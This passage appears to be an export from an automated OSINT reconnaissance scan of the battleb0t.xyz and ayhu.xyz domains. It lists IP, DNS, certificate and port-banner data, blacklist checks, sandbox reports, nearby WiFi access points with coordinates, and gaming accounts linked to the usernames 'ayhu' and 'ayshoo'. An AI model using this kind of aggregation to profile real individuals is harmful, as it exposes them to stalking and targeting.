"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:00:21:01) | 37.780462,-122.390564 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | PHP 7.4.33 | 87.248.157.102 |
| 2023-05-12 03:09:44 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 129.97.148.34.bc.googleusercontent.com | 34.148.97.129 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.120): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.207): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Information technology companies of England | baffin.netcraft.com |
| 2023-05-12 03:11:19 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Bursa', u'security': {u'is_vpn': False}, u'city_geoname_id': 750269, u'region_geoname_id': 750268, u'country': u'Turkey', u'region': u'Bursa', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'Dgn Teknoloji A.s.', u'isp_name': u'Shiraz-University', u'organization_name': u'Shiraz University', u'autonomous_system_number': 43260}, u'continent_code': u'AS', u'currency': {u'currency_name': u'Lira', u'currency_code': u'TRY'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/TR_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/TR_flag.png', u'unicode': u'U+1F1F9 U+1F1F7', u'emoji': u'\U0001f1f9\U0001f1f7'}, u'postal_code': u'16350', u'longitude': 29.0398, u'country_code': u'TR', u'timezone': {u'abbreviation': u'+03', u'gmt_offset': 3, u'is_dst': False, u'name': u'Europe/Istanbul', u'current_time': u'06:11:18'}, u'latitude': 40.2024, u'country_geoname_id': 298795, u'continent_geoname_id': 6255147, u'country_is_eu': False, u'ip_address': u'87.248.157.102', u'continent': u'Asia', u'region_iso_code': u'16'} | 87.248.157.102 |
| 2023-05-12 02:44:15 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | fluid.battleb0t.xyz |
| 2023-05-12 02:54:27 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 14618 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | nginx nginx 1.18.0 | 165.232.113.85 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:37:7A:7B) | 39.0469, -77.4903 |
| 2023-05-12 03:02:26 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | www.ayhu.xyz |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | BIGO Live (Category: gaming)<br>https://www.bigo.tv/user/ayshoo | ayshoo |
| 2023-05-12 02:54:44 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found<br>Server: Netlify<br>X-Nf-Request-Id: 01H06KNWSV7RTZ7MSA7BNCK843<br>Date: <REDACTED><br>Content-Length: 0 | 35.229.48.116 |
| 2023-05-12 02:50:27 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 25, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.activestate.com/products/perl/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6456:304:WilStaging_02"\n "Local\\SM0:6456:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:6456:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"13.227.74.81:443"\n "138.91.254.96:443"\n "13.227.74.26:443"\n "142.250.189.174:443"\n "104.16.184.65:443"\n "185.199.108.153:443"\n "104.17.211.243:443"\n "142.251.32.34:443"\n "104.17.212.243:443"\n "23.55.103.97:443"\n "13.227.74.25:443"\n "13.227.74.111:443"\n "151.101.1.131:443"\n "104.18.135.59:443"\n "13.227.74.121:443"\n "157.240.22.25:443"\n "142.250.101.156:443"\n "216.239.38.181:443"\n "54.219.220.207:443"\n "13.227.74.73:443"\n "13.227.74.69:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"59e3fd97d0784951aaf980d5dbb23a79.events.ubembed.com"\n "59e3fd97d0784951aaf980d5dbb23a79.js.ubembed.com"\n "59e3fd97d0784951aaf980d5dbb23a79.pages.ubembed.com"\n "activestate.github.io"\n "ajax.googleapis.com"\n "analytics.google.com"\n "api.edgeoffer.microsoft.com"\n "api.hubspot.com"\n "assets.ubembed.com"\n "builder-assets.unbounce.com"\n "cdn.activestate.com"\n "cdn.heapanalytics.com"\n "cdn.linkedin.oribi.io"\n "connect.facebook.net"\n "d2xxq4ijfwetlm.cloudfront.net"\n "epsilon.6sense.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms-na1.hsforms.com"\n "forms.hscollectedforms.net"\n "forms.hsforms.com"\n "googleads.g.doubleclick.net"\n "heapanalytics.com"\n "js.hs-analytics.net"\n "js.hs-banner.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "px.ads.linkedin.com" (Indicator: "dir "; File: "PCAP")\n Found string "www.facebook.com" (Indicator: "dir "; File: "PCAP")\n Found string "www.linkedin.com" (Indicator: "dir "; File: "PCAP")\n Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': 
u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," 
(Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""bellagracehealthscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""belleandbubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""beyondblessedscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00005804]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005804]\n "wallet-stable.json" has type "ASCII text"- Location: [%TEMP%\\5804_613645668\\json\\wallet\\wallet-stable.json]- [targetUID: 00000000-00005804]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\5804_613645668\\wallet.bundle.js]- [targetUID: 00000000-00005804]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\5804_345640691\\Filtering Rules]- [targetUID: 00000000-00005804]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\5804_613645668\\edge_driver.js]- [targetUID: 00000000-00005804]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\5804_613645668\\vendor.bundle.js]- [targetUID: 00000000-00005804]\n "data_1" has type "data"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00005804]\n "c4f2a21b-1d0c-4869-a5c9-82d03712e897.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 52082"- Location: [%TEMP%\\c4f2a21b-1d0c-4869-a5c9-82d03712e897.tmp]- [targetUID: 00000000-00005804]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\5804_613645668\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00005804]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00005804]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00005804]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\5804_613645668\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00005804]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\5804_613645668\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00005804]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\5804_613645668\\Mini-Wallet\\miniwallet.bundle.js]- [targetUID: 00000000-00005804]\n "notification.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\5804_613645668\\Notification\\notification.bundle.js]- [targetUID: 00000000-00005804]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00005804]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\5804_345640691\\Filtering Rules-AA]- [targetUID: 00000000-00005804]\n "000014.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Default\\EdgeCoupons\\coupons_data.db\\000014.ldb]- [targetUID: 00000000-00005804]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00005804]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00005804]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft | 185.199.108.153 |
| 2023-05-12 02:44:12 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=GB,ST=Greater Manchester,L=Salford,O=Sectigo Limited,CN=Sectigo RSA Domain Validation Secure Server CA | kekw.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | adrilankha (Net ID: 00:06:25:66:F5:F2) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 125.97.148.34.bc.googleusercontent.com | 34.148.97.125 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 0.church | 185.199.111.153 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01001101ck.github.io]<br>https://www.openphish.com/feed.txt | 01001101ck.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CarlsJr_Wireless (Net ID: 00:0C:42:6B:5A:82) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:58:30 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://southgate.ai/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_8a8_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_8a8_IESQMMUTEX_0_519"\n "IsoScope_8a8_IE_EarlyTabStart_0xb94_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_8a8_ConnHashTable<2216>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2216"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_8a8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_8a8_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', 
u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1513.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar14E2.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.164.10:443"\n "142.250.31.95:443"\n "104.16.87.20:443"\n "142.250.188.200:443"\n "34.74.170.74:443"\n "142.251.163.94:443"\n "172.253.122.155:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "ACP1XSAW.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ACP1XSAW.txt]- [targetUID: 00000000-00002216]\n Dropped file: "E1RPTRSJ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\E1RPTRSJ.txt]- [targetUID: 00000000-00003504]\n Dropped file: "6SDWGML8.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6SDWGML8.txt]- [targetUID: 00000000-00003504]\n Dropped file: "TOQ8R1LZ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TOQ8R1LZ.txt]- [targetUID: 00000000-00003504]\n Dropped file: "8AFC20ZQ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8AFC20ZQ.txt]- [targetUID: 00000000-00003504]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', 
u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1512.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab14E1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "latex.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003504]\n "fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "vendor-bundle.min.c7b8d9abd591ba2253ea42747e3ac3f5_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "instantsearch.production.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "~DF4ED835C2140DC3C0.TMP" has type "data"- Location: 
[%TEMP%\\~DF4ED835C2140DC3C0.TMP]- [targetUID: 00000000-00002216]\n "js_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._5E4C1B7D-7577-11ED-BDC3-080027DA0E36_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF52C41F7A5B885E2E.TMP" has type "data"- Location: [%TEMP%\\~DF52C41F7A5B885E2E.TMP]- [targetUID: 00000000-00002216]\n "JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCuM70w9_1_.woff" has type "Web Open Font Format TrueType length 51152 version 1.1"- [targetUID: N/A]\n "_692F3876-7577-11ED-BDC3-080027DA0E36_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "GC2JP03J.htm" has type "HTML document UTF-8 Unicode text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0CH0OVJV\\GC2JP03J.htm]- [targetUID: 00000000-00003504]\n "logo_hud805459e1585bd759bb2db1da4556ab3_12226_0x70_resize_lanczos_3_1_.png" has type "PNG image data 560 x 70 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DF58E90E44EE511DCA.TMP" has type "data"- Location: [%TEMP%\\~DF58E90E44EE511DCA.TMP]- [targetUID: 00000000-00002216]\n "netlify-identity-widget_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "saioutcome1-poster_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 1248x702 components 3"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "cookieconsent.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, 
u'description': u'Pattern match: "https://southgate.ai/"\n Pattern match: "https://southgate.ai"\n Heuristic match: "cdn.jsdelivr.net"'}], u'threat_level': 0, u'size': None, u'job_id': u'638f679fb1d2070160672c24', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'172.67.164.10', u'142.250.31.95', u'104.16.87.20', u'142.250.188.200', u'34.74.170.74', u'142.251.163.94', u'172.253.122.155'], u'sha256': u'c4919dc5ebcf054490c8ebabbb453b631c7d016ba87624dd98df4535c94ee593', u'sha512': u'416295b19343a55ad008e5d040d557f23faa8f3f408a08b705180cabac4cc0f2c7ac041b85ea2bfe88c7898028eba01fbc354b9a3a5a87f71af169b394978ae3', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://southgate.ai/', u'submission_id': u'638f679fb1d2070160672c25', u'created_at': u'2022-12-06T16:02:39+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-06T16:02:39+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 7, u'av_detect': 0, u'machine_learning_models': [], 
u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'5ee7036b0ff5a48e7c65fdf244332b48', u'network_mode': u'default', u'processes': [], u'sha1': u'db6bec1322306bff607b711410ce9b65d4a08a9d', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, | 34.74.170.74 |
| 2023-05-12 02:44:08 | Internet Name | No | CertSpotter | 33 | 0 | 1 | 0 | None | funny.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:00:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.28): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:25 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.109.153 |
| 2023-05-12 02:54:20 | HTTP Headers | No | Web Spider | 2 | 0 | 2 | 0 | None | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:53:07 GMT", "x-nf-request-id": "01H06Y2Y8V02FJ2S9V869KY74K", "content-type": "text/html; charset=UTF-8", "age": "73"} | funny.battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden<br>Date: <REDACTED><br>Content-Type: text/html; charset=UTF-8<br>Transfer-Encoding: chunked<br>Connection: close<br>X-Frame-Options: SAMEORIGIN<br>Referrer-Policy: same-origin<br>Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br>Expires: Thu, 01 Jan 1970 00:00:01 GMT<br>Vary: Accept-Encoding<br>Server: cloudflare<br>CF-RAY: 7c5eb92eaeff3814-FRA<br>Content-Encoding: gzip | 104.21.71.14 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | rsi (Category: gaming)<br>https://robertsspaceindustries.com/citizens/ayhu | ayhu |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | Certificate:<br>Data:<br>Version: 3 (0x2)<br>Serial Number:<br>04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8<br>Signature Algorithm: sha256WithRSAEncryption<br>Issuer: C=US, O=Let's Encrypt, CN=R3<br>Validity<br>Not Before: Dec 14 03:53:54 2022 GMT<br>Not After : Mar 14 03:53:53 2023 GMT<br>Subject: CN=ayhu.xyz<br>Subject Public Key Info:<br>Public Key Algorithm: rsaEncryption<br>RSA Public-Key: (2048 